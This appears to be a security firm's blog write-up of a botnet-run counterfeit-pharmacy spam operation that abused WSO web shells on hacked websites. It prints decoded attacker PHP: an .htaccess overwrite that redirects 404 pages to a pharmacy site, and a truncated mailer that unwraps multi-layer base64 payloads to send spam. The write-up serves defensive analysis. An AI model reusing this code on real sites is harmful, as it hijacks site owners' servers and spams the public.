Email spam is a bane of our online existence. It serves as a distribution mechanism for false information, infectious malware, phishing messages and everything in between.

Among spam campaigns, the “Canadian pharmacy” scam is one of the worst. It’s a poster child for pharma spam—the most common form of spam—which has been clogging inboxes with ads for male-enhancement pills and painkillers for years.

The scam has been traced back to organized crime syndicates operating in what is estimated to be a 431 billion dollar, and growing, market. Its scale, and the danger counterfeit drugs pose to the public health, prompted repeat action from FDA, Interpol, among others.

We recently got a behind-the-scenes look at one such operation after intercepting encoded communications from a botnet consisting of 80,000 compromised devices. The botnet was used for an innovative spam campaign built to circumvent security countermeasures.

The following is the account of our investigation, the details of which were already shared with relevant law enforcement and regulatory agencies.

Update:

On April 7th, as we were putting finishing touches on this research, a news story broke out about a high profile arrest of Russian spam kingpin Peter Levashov. The arrest was timed with a simultaneous takedown Peter’s botnet, which consisted of tens of thousands of virus-infected devices.

The similarities between this news story and our own research immediately made us consider that we might have been tracking Peter’s botnet. However, in the four days following Peter’s arrest (April 8 – 11) we saw the activity of “our” spam botnet increase by 11 percent, compared to the same days of the previous weeks. This clearly shows that it wasn’t the one that was taken down and, in fact, might be even benefiting from the removal of a prominent competitor.

Bouncing Victims off 404s to Bypass Spam Filters

Our investigation began about a month ago when we noticed an unusually high number of base64-encoded requests triggered by our security rules.

A deeper inspection revealed that the requests originated from a large undocumented botnet that was issuing command orders to websites infected with a WSO Web Shell—a commonplace PHP backdoor used for remote file management and code execution.

We were able to identify three types of requests:

Orders to modify .htaccess files

Orders to inject compromised sites with custom-made PHP malware

Heavily obfuscated payloads meant to be decoded by the PHP malware

Together, the requests revealed a sneaky three-pronged spam attack:

1: .htaccess injection

The first thing we noticed was a slew of encoded commands, the purpose of which was to modify .htaccess configuration files on compromised sites. Here is an example of one of these commands (with sensitive data removed):

{'a': ['Php'], 'charset': ['Windows-1251'], 'p1': ['$oacomkme = base64_decode(""JGZpbGVfYm9keSA9ICdEUW9OQ2cwS0RRb05DZzBLRFFvTkNnMEtEUW9OQ2cwS0RRb05DZzBLRFFvTkNnMEtEUW9OQ2cwS0RRb05DZzBLRFFvTkNnMEtEUW9OQ2cwS0RRb05DZzBLRFFvTkNnMEtEUW9OQ2cwS0RRb05DZzBLRFFvTkNnMEtEUW9OQ2cwS0RRb05DZzBLRFFvTkNnMEtEUW9OQ2cwS0RRb05DZzBLRFFvTkNnMEtEUW9OQ2drSkNRa0pDUWtKQ1FrSkN…

Figure 1: Encoded communication with the WSO backdoor shell (truncated)

Decoding the above string revealed this simple script:

$file_body = 'DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCgkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQlFcnJvckRvY3VtZW50IDQwNCBodHRwOi8veHh4eHh4Lnh4Lw0KCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=='; $file_name = '.htaccess'; $root = $_SERVER["DOCUMENT_ROOT"]; if (strpos($root,'/') !== false) { $path = $root . "/" . $file_name; } else $path = $root . "\\" . $file_name; //$ass = file_get_contents($path); //file_put_contents($path, base64_decode($file_body), FILE_APPEND); file_put_contents($path, base64_decode($file_body)); //echo '**##** ' . $ass . ' ***###***'; echo mt_rand(400, 100000);

Figure 2: Decoded .htaccess injection command to the WSO backdoor shell

The command itself was further obfuscated (see the $file_body variable above). It took another round of decoding to see that the purpose of the .htaccess injection was to route visitors from non-existing (404) URLs of a victim site to an e-store selling allegedly counterfeit drugs.

ErrorDocument 404 http://xxxxxx.xx/

Figure 3: Decoded directive for the .htaccess injection (domain obfuscated)

True to form, each of these e-stores proclaimed itself to be a web front for a “Canadian pharmacy”, despite the fact that most were .ru domains and none were hosted in Canada.

In some cases the site template used by these sites could be linked to known spam schemes, such as in case of the so-called “Canadian-Health&Care Mall”, run by this chap from Getty Images.



Figure 4: Fake owner of the Canadian Health&Care Mall (Soruce Fraud Report Wiki

2: Custom-made malware

As we were working to understand the purpose of the .htaccess injection, we intercepted another kind of twice-encoded communication between the botnet and WSO shells. This time it was a file injection command that facilitated the installation of a custom-made PHP malware.

This is how this command looked after decoding:

… if (array_key_exists('RAGA', $_POST)) { echo '9iruYGHS6353'; exit; } //set_time_limit ( 666000 ); @ignore_user_abort (true); $i = 0; $result = ''; foreach($_POST as $key=>$value){ $strings = explode('|',base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode($value))))))))); $to_email = base64_decode(base64_decode(base64_decode($strings[0]))) ; $subject = base64_decode(base64_decode(base64_decode($strings[1]))); $body = base64_decode(base64_decode(base64_decode($strings[2]))) ; $header = base64_decode(base64_decode(base64_decode($strings[3]))); $body = wordwrap($body, 70, "\r

"); //$header = $header . 'X-Mailer: PHP/' . phpversion(); //$header = $header .

Figure 5: Decoded PHP custom-made spam malware (truncated)

As evidenced by the script, the malware was programmed to construct spam emails from remotely received payloads containing the following four parameters: $to_email, $subject, $body and $header.

The malware would decode these parameters, create the spam email and send it out using the email mail() function from the sites’ configured SMTP server (as configured in the PHP configuration files for the hosted site).

3: The obfuscated payload (B64ryoshka)

With the PHP malware identified, we were able to start tracking payloads it was receiving from the botnet. During our investigation we were able to intercept hundreds of thousands of payloads, each containing an sales pitch for a counterfeit drug—usually 20mg of Cialis or 100mg of Viagra. The awkward wording of the emails points to them being randomly generated.

The most notable thing about the requests was the effort put into their obfuscation. Each payload had eight layers of base64 encoding, plus three more for each pipe (‘|’) separated parameter.

Internally, the nested encoding of this payload, and the presumably Russian origin of this spam campaign, earned it the name B64ryoshka (pronounced “Ba-tryo-shka”).

Included in each of the B64ryoshka payloads was a link to a non-existing URL on another compromised domain.

Once we saw the links, everything fell into place and we realized that what we had here is an elaborate attack built to bypass spam filters—the type that identifies unwanted messages based on sender identity and links to known malicious domains.

The hustle works by pairing two compromised domains—one to issue out spam emails and the other to reroute visitors to the fake pharmacy store:

Figure 6: Attack progression—domain B sends spam emails, linking to 404 pages on domain A.

The above diagram oversimplifies things by using only two domains. It doesn’t account for the added complexity of running the scam over a network of interlinking sites, spewing out daily floods of spam email while juggling a multitude of visitors.

Making something like this work requires a team effort. Based on everything we saw, there’s no doubt that we were dealing with a widespread criminal operation.

Size Matters: Lots of Fake Pharmacies and One HUGE C2 Botnet

One indicator of the size of this operation is the number of fake pharmacy domains the offenders have at their disposal.

In the course of our investigation, we were able intercept payloads with details of 51 websites used by spammers to sell counterfeit drugs. These were located in China, Malaysia, Vietnam, Ukraine, France, Taiwan, Russia, Indonesia and Romania.

Tracing back the IPs of these website we were to discover 1,005 more active domains, presumably used by spammers. 70.2 percent of these are hosted in Russia and the rest are hosted in France.

No less impressive is the size of the botnet that controlled this network of compromised websites. Over a period of 14 days, we intercepted communications from 86,278 unique IPs worldwide.

Figure 7: Geo-locations of botnet IPs

Country IP count % of botnet IPs Russian Federation 9,954 11.5% Indonesia 7,528 8.7% Vietnam 6,850 7.9% Egypt 4,757 5.5% Pakistan 4,642 5.4% India 3,656 4.2% Algeria 3,571 4.1% Thailand 3,334 3.9% Philippines 2,555 3% Kazakhstan 2,230 2.6%

Figure 8: Top locations of botnet IPs

This botnet functioned as a colossal C2 (command and control) center for the network of compromised sites. In practical terms, it was responsible for issuing injection commands and periodically sending out B64ryoshka payloads with details of new spam targets.

The botnet’s surprising size, considering the relatively low-resource function it serves, illustrates both the effort its operators invested in the scheme, as well as the lengths taken to cover their tracks.

And in case you were wondering, we have reasons to believe that this wasn’t yet another IoT botnet. For one thing, in the course of our investigation, we saw legitimate browser requests originate from compromised devices that were consistent with what’s considered to be typical traffic patterns.

This could indicate that the bulk of the botnet IPs belonged to some type of web browsing devices (e.g., home computers) that were compromised through an application layer attack, such as a malicious browser ad-on. An even stronger indication was the fact that only a few of the botnet IPs were recorded in Shodan, which would not be the case if it was an IoT botnet.

The Evolution of Organized SPAM

Previous reports have already linked Canadian pharmacy spam to Russian and Ukrainian criminal organizations. We saw these footprints in our data as well, both in the prevalence of .ru domains and the location of the botnet devices used in the attack.

Our analysis furthers this discussion by showing just how elaborate spam campaigns have become and the methods have evolved to bypass current-gen spam filters.

We hope that in sharing this data, we can promote awareness among potential victims of spam schemes. Site owners and security vendors in charge of email filtering run the risk of having their websites blacklisted for being unwittingly used in similar spam attacks.